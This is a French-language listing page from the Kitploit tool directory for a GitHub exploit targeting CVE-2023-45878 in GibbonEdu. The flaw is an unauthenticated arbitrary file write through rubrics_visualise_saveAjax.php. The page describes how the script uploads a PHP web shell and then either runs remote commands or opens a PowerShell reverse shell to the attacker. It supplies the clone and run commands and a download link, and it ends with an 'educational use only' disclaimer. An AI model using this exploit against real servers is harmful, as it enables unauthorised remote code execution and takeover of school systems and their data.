Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-45878 — GibbonEdu - Écriture arbitraire de fichier menant à une exécution de code à distance | Kitploit
Outils/GitHubGitHub/davidzzo23/cve-2023-45878
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu - Écriture arbitraire de fichier menant à une exécution de code à distance

Voir le dépôt
32il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-45878

GibbonEdu – Écriture arbitraire de fichier menant à l'exécution d'un Web Shell

Description

Ce dépôt contient un exploit pour CVE-2023-45878, une vulnérabilité d'écriture arbitraire de fichier dans GibbonEdu. La vulnérabilité affecte le point d'accès rubrics_visualise_saveAjax.php et permet à un attaquant non authentifié de téléverser des fichiers arbitraires sur le serveur web.

Ce script exploite la vulnérabilité pour téléverser un Web Shell PHP et soit :

  • Exécuter une commande système spécifique ;
  • Déclencher un reverse shell PowerShell encodé en base64 pour obtenir un accès à distance.

Utilisation

Le script prend en charge deux modes de fonctionnement :

  • --command (-c) : exécuter une commande système spécifique à distance.
  • --shell (-s) : déclencher un reverse shell PowerShell vers l'écouteur de l'attaquant.

Comment exécuter l'exploit

1. Cloner le dépôt

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Exécuter l'exploit du Web Shell

  • Exécuter une commande à distance :
root@kitploit:~
python3 CVE-2023-45878.py -t <cible_domaine> -c "whoami"
  • Déclencher un reverse shell PowerShell :
root@kitploit:~
python3 CVE-2023-45878.py -t <cible_domaine> -s -i <ip> -p <port>

Avertissement

Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de cet exploit sur des systèmes sans permission est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit.

Télécharger l’outil